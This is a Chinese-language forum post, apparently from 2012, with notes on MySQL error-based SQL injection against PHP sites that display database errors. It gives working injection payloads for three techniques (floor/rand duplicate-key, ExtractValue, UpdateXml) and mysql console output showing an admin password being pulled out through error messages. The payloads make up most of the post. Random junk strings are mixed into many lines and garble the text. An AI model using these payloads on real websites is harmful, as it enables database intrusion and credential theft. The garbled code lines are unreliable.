放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。$ P* m; g% J& [! @& Y: {$ x
实际测试环境:
5 I2 \! ^( l) C& }; b
) C' p7 B, F- W; H" z7 y - q+ @7 `% [: ?
mysql> show tables;
# _2 v5 a! n- O+----------------+
1 ^. a$ N! \1 S6 K| Tables_in_test |0 h# |4 s7 x4 u& w( o0 p
+----------------+
8 `1 J+ [! T) q& r2 {; || admin |" n) `+ J. Y; }+ D$ a( V
| article |
) L- t9 P3 M! |+ `' g/ c9 o D+----------------+
" Q' J& r3 V ]) T: n: M3 D6 i
8 ~$ Z4 f% @% |6 h ! N3 p# l0 Q, l) O4 e
) ?, I% m# N- amysql> describe admin;4 {5 q- g& L3 ~* ^$ n& ]0 t
+-------+------------------+------+-----+---------+----------------+8 N( G; e# x) ~+ _
| Field | Type | Null | Key | Default | Extra |
% y4 ?! f1 s, O) u" g, m% |+-------+------------------+------+-----+---------+----------------+9 x! s Z$ f% N: k2 U1 X$ J" X
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |0 H: d& Y. m% ^- `- R
| user | varchar(50) | NO | | NULL | |
7 s7 t$ p3 g/ j" `" h2 Z| pass | varchar(50) | NO | | NULL | |9 |! Z" a# ]. U, ~& i+ B
+-------+------------------+------+-----+---------+----------------+
8 {. l6 S( V4 ?" N( @
0 w/ s; _8 }/ [6 m4 ^. N # w+ N. C$ J, Y7 ]4 z5 P3 n- L8 q" ]8 g
, c+ q# x4 S+ D* {9 T! Hmysql> describe article;) u3 z& ]! _" t4 Z: s9 |
+---------+------------------+------+-----+---------+----------------+
T) f2 [! f: S( c) c6 k. Y| Field | Type | Null | Key | Default | Extra |; |- ^) U6 l& g: o g; a* |
+---------+------------------+------+-----+---------+----------------+( E5 L# R' e7 N+ H; l0 |2 M5 u3 R
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |0 ^/ ]" P1 m. C5 j
| title | varchar(50) | NO | | NULL | |
" P6 j$ [8 s+ c- Z* n) U9 a: Y| content | varchar(50) | NO | | NULL | |
+ ~, ?# d2 f9 e) _- f M+---------+------------------+------+-----+---------+----------------+( L1 i) e, I) ~2 y* O
1、通过floor报错4 E0 W: Y9 w' T, d
可以通过如下一些利用代码* r9 ?& _4 Z6 z. s9 [; W
5 G7 k0 _5 N2 f8 z) b9 s$ m% I
" d. t' e; m, _$ O3 u0 V0 Aand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x2 T3 O K1 e9 ~! D/ d" ]1 l2 E
from information_schema.tables group by x)a);
; N- z1 M5 r, E! H" Z3 Q) ?
9 o$ P# {7 A9 l$ F6 b " Y7 s6 T9 g3 w
and (select count(*) from (select 1 union select null union select !1)x/ R5 e* E3 a5 V% z8 v- f% T
group by concat((select table_name from information_schema.tables limit 1),
$ ]# {/ j7 r' C9 n0 C cfloor(rand(0)*2)));- ?6 b: ^9 D8 E4 |5 z" K
举例如下:
: h; U' E5 M3 O. C. t/ T/ _* C首先进行正常查询:
8 G# F& h4 [; P& U0 e ' r7 u) x- x5 h( A( A2 R; x
mysql> select * from article where id = 1;
+ ~& c# t6 b9 l- @" G+----+-------+---------+ ]2 h" W: H7 M6 `) d0 e$ t
| id | title | content |% O0 j Q' S0 ?" Y
+----+-------+---------+. N: z9 V5 s; g! F
| 1 | test | do it |% p* L/ D# s! p
+----+-------+---------+
& r* \3 j* J6 q假如id输入存在注入的话,可以通过如下语句进行报错。
1 k' l8 s* f) q$ j! _ c . S8 Z; l Y& a/ Y6 V
1 Z' n3 P. }+ p# t4 A W8 Y! f: ?mysql> select * from article where id = 1 and (select 1 from
2 n; T& I8 k7 _4 D(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);+ \4 b. }: G, X2 h/ G& D
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'5 a, }# C4 g- ^" T- |
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。4 X& S7 e8 r+ N" c4 z5 a. u6 {4 c* R
例如我们需要查询管理员用户名和密码:2 S: ~5 e# z, p/ m/ u
Method1:
( z+ p/ C% ]' Y6 q, C J) B ) B5 M5 w% |- ?* Y r$ P. Y: ?* ~
$ X4 w( J j& a& w9 f) g3 V. `1 Zmysql> select * from article where id = 1 and (select 1 from
9 O9 d7 \8 B: v; |- d8 d6 @(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x' g* J; f5 j1 L D! Z
from information_schema.tables group by x)a);& n$ ]* V9 P$ h$ `
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
+ y, a! I- W+ T+ o6 Y6 D# r% jMethod2: i* i0 |* K4 {+ B
8 W# u4 s8 \1 [
8 `+ v9 j3 R" ^6 A9 k0 hmysql> select * from article where id = 1 and (select count(*)
# h4 v6 D) C: i- t& p, ?from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
- I- @5 ?+ b+ _0 l) nfloor(rand(0)*2)));% L9 \* A; u& @2 Z% [
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
4 c a* c% C k6 X" {: E2、ExtractValue0 L( i) D+ }! e6 F* g3 o, E3 \
测试语句如下
; n7 s# r7 G4 E8 d
9 X8 e: b. \4 a8 A4 l; X* V! P
" {. c+ O m3 X! ^. Q5 c9 i# `' R8 Uand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
& T7 d) d8 }2 ?' J5 o, D/ x实际测试过程
3 L% E2 |+ r5 j- G: a+ a
) E6 V/ b& C6 m8 Z: C
+ Q/ A6 M' n# [% K% Jmysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
9 c. R. Q. R" G4 F& l4 J" L8 ~6 p. U(select pass from admin limit 1)));--
+ q0 k6 w7 A+ z I1 @3 k4 oERROR 1105 (HY000): XPATH syntax error: '\admin888'& P, U) s2 Q% p" d
3、UpdateXml* [0 z4 Y" d% s: ?/ h$ h* Z! R2 z
测试语句- d8 @# d) |4 E% B
0 K" _! n2 }: @7 ]. p( q ! R" Y. v2 P# I$ r
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
4 R D- D. t" d4 P; `: x8 ]; i实际测试过程0 E7 S( d, f, }8 H
' y5 y& F1 {7 L+ a1 \& K. c
+ o, P7 n# V. e: V Wmysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,- i& b% b7 U5 i8 L: Y. t' h
(select pass from admin limit 1),0x5e24),1));) f& b% p: a. f* ?' m
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'3 E$ q1 C( D5 I* v
All, thanks foreign guys.- p7 G+ d5 I5 ?% m: U% ~+ k" A
. o/ G$ T" O5 U9 S( w8 N
/ j. c* M& q$ R7 H: ]8 c |
发表于 2012-12-10 10:28:51
收藏
分享
支持
反对